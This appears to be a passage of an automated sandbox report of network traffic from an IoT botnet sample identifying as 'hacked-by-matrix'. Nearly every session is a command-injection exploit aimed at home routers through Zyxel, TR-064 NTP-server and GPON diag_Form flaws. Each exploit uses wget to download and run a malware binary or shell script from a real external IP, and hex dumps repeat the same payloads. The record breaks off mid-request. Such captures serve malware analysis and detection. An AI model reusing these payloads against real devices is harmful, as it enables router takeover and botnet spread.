                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:08.576662064 CET847INHTTP/1.1 302 Found
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Location: https://127.0.0.1:443/cgi-bin/ViewLog.asp
                                                        Content-Length: 225
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 3a 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 33 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://127.0.0.1:443/cgi-bin/ViewLog.asp">here</a>.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:23:08 GMTContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.13487882.140.223.577547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.558481932 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:09.324898005 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:09.577334881 CET684INHTTP/1.1 500 Internal Server Error
                                                        Server: gSOAP/2.7
                                                        Content-Type: text/xml; charset=utf-8
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 43 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 63 77 6d 70 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 63 77 6d 70 2d 31 2d 30 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 66 61 75 6c 74 63 6f 64 65 3e 53 4f 41 50 2d 45 4e 56 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 4e 6f 20 58 4d 4c 20 65 6c 65 6d 65 6e 74 20 74 61 67 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"><SOAP-ENV:Body><SOAP-ENV:Fault SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><faultcode>SOAP-ENV:Client</faultcode><faultstring>No XML element tag</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.1346840190.103.42.907547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.561868906 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:08.801471949 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.1341654220.88.23.357547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.635551929 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.134238242.245.130.246443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685745955 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.1352838109.108.102.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685786963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.13527885.207.99.185443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685805082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.13561065.32.95.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685816050 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.133981042.229.194.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685821056 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.1351920212.17.219.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685821056 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.13367405.11.220.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685821056 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.1356872118.248.14.181443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685883999 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.1337444212.184.196.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685923100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.1334076109.0.169.180443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685942888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.13603405.154.72.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685961962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.134535842.206.118.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.685967922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.133852042.32.232.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686038017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
